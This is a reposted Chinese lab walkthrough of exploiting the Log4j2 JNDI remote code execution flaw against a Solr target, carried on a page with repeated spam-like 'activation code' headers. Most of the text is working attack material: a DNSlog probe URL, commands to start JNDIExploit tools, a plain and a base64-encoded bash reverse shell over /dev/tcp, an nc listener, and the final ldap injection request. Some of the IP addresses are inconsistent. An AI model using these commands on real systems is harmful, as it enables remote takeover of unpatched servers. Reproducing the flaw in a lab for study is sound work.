柚子快報(bào)激活碼778899分享:log4j2漏洞復(fù)現(xiàn)
柚子快報(bào)激活碼778899分享:log4j2漏洞復(fù)現(xiàn)
Log4j2是Apachel的一個(gè)java日志框架,我們借助它進(jìn)行日志相關(guān)操作管理,然而在2021年未10g4j2爆出了遠(yuǎn)程代碼執(zhí)行漏洞,屬于嚴(yán)重等級(jí)的漏洞
1、執(zhí)行以下命令啟動(dòng)靶場環(huán)境并在瀏覽器訪問
2、在DNSlog平臺(tái)請(qǐng)求一個(gè)dns域名:
http://192.168.3.70:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.649god.dnslog.cn}
直接訪問
可知版本信息1.8.0
3、反彈shell需要使用JNDIExploit.v1.2
此時(shí),
kali2024:中轉(zhuǎn)--192.168.3.232
kali2023:攻擊--192.168.3.137
centos7:靶機(jī)--192.168.3.70
首先在中轉(zhuǎn)機(jī)上使用JNDIExploit-1.2-SNAPSHOT.jar文件使用java啟動(dòng),命令如下:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.3.179
bash -i >& /dev/tcp/192.168.3.70/8080 0>&1
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMuMTM3LzgwODAgMD4mMQ==} | {base64, -d} |bash" -A 192.168.3.137
攻擊機(jī):開啟監(jiān)聽nc -lvvp 6666
此時(shí)構(gòu)造如下命令:
http://192.168.3.70:8983/solr/admin/cores?action=${jndi:ldap://192.168.3.137:1389/0izjha}
訪問,成功反彈
http://192.168.3.70:8983為靶機(jī)的地址
192.168.3.232為中轉(zhuǎn)機(jī)地址
192.168.3.137為Kali攻擊機(jī)ip地址,此時(shí)要反彈shell
柚子快報(bào)激活碼778899分享:log4j2漏洞復(fù)現(xiàn)
推薦閱讀
本文內(nèi)容根據(jù)網(wǎng)絡(luò)資料整理,出于傳遞更多信息之目的,不代表金鑰匙跨境贊同其觀點(diǎn)和立場。
轉(zhuǎn)載請(qǐng)注明,如有侵權(quán),聯(lián)系刪除。